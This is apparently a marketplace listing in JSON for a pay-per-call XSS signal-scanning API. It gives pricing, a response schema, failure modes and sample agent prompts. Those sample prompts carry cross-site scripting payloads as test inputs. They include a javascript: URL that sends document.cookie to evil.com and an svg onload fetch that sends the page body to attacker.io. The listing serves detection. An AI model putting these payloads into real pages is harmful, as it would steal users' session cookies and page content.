{"uid":"cap_gqLv8Kmdpj4OZ2F4voVCQ","slug":"delx-commerce-xss-signal-scan-66109f9e","name":"Delx Commerce XSS Signal Scan","description":"Pay-per-result APIs for agents. No signup. Exact price. Verifiable delivery. USDC on Base + Solana via x402.","url":"https://commerce.delx.ai/api/v1/x402/xss-signal-scan?utm_source=zero.xyz","method":"POST","headers":{},"bodySchema":{"type":"object","properties":{"text":{"type":"string","description":"Input field: text."}}},"responseSchema":{"type":"json","example":{"risk":"high","schema":"delx/util-xss-signal-scan/v1","advisory":"Heuristic only; use parameterization, contextual encoding, and allowlists.","text_sha256":"5c140d35dcb46a622e2cedf5ef5cc3638cdffd1c118c9331f8c84669f0b74783","signal_count":1,"values_returned":false}},"example":null,"exampleRequest":null,"tags":["x402"],"displayCostAmount":"0.003","displayCostAsset":"USDC","priceDynamic":false,"priceHint":null,"priceStatus":"priced","priceSource":"probe","requiresHandshake":false,"reviewCount":0,"rating":{"score":"0.00","successRate":"0.00","reviews":0,"stars":null,"state":"unrated"},"availabilityStatus":"unknown","priceObserved":null,"sessionDeposit":null,"pricing":{"kind":"static","summary":"$0.003/call","primary":{"kind":"static","protocol":"x402","network":"base","amountUsd":"0.003","per":"call","confidence":"exact"},"accepted":[{"kind":"static","protocol":"x402","network":"base","amountUsd":"0.003","per":"call","confidence":"exact"}]},"paymentMethods":[{"uid":"pm_CWBefqTrBp7aiNcfes0gY","protocol":"x402","methodType":"crypto","chain":"base","mode":"charge","costAmount":"0.003","costPer":"request","priority":0,"asset":"0x833589fCD6eDb6E08f4c7C32D4f71b54bdA02913","unit":"request","depositMicros":null,"planRef":null}],"brandName":null,"brandSlug":null,"brandBaseUrl":null,"brandDocsUrl":null,"whatItDoes":"Scans a text string for XSS (cross-site scripting) attack signals and returns a risk level and signal count","exampleAgentPrompt":"Can you scan this text for XSS attack signals and tell me the risk level: '<script>alert(document.cookie)</script>'?","exampleUseCases":[{"title":"Screening user-submitted form input","prompt":"Before I save this comment to my database, scan it for XSS signals and tell me if the risk is high, medium, or low: '<img src=x onerror=alert(1)>'."},{"title":"Validating API input in a pipeline","prompt":"Check this query parameter value I just received for any cross-site scripting attack patterns and give me the signal count: 'javascript:void(document.location=\\'http://evil.com/steal?c=\\'+document.cookie)'."},{"title":"Security audit of scraped web content","prompt":"I just scraped this text from an untrusted page — can you run an XSS signal scan on it and tell me whether it looks risky: '<svg/onload=fetch(\\'https://attacker.io/log?x=\\'+btoa(document.body.innerHTML))>'?"}],"resultDescription":"Returns a JSON object with a risk field ('high', 'medium', or 'low'), a signal_count integer indicating how many XSS signals were found, a text_sha256 hash of the input for verifiability, a schema identifier, an advisory note recommending parameterization and contextual encoding, and a values_returned boolean indicating whether matched values are exposed in the response.","failureModes":["Missing or empty 'text' field returns a validation error","Extremely long strings may be truncated or rejected","Heuristic-only detection means false negatives are possible for obfuscated payloads","False positives may occur on benign HTML-like content","Payment failure via x402 results in 402 response before scan is executed"],"whenToPreferThis":"Choose this endpoint when you need a fast, pay-per-use, no-signup XSS heuristic signal check on a specific text string, especially within an agentic pipeline that already handles x402 micropayments on Base or Solana. It is ideal for lightweight pre-validation gates rather than full WAF replacement. Prefer it over heavier security scanners when cost-per-call and zero-friction onboarding matter most.","instructions":null,"reviewSummary":null,"reviewSummaryHighlights":null,"reviewSummaryConcerns":null,"reviewSummaryGeneratedAt":null,"activationCount":0,"lastUsedAt":null,"lastSuccessfullyRanAt":null,"lastHealthCheckAt":"2026-10-01T00:54:01.490Z","isFirstParty":false,"canonicalSlug":"delx-commerce-xss-signal-scan-66109f9e"}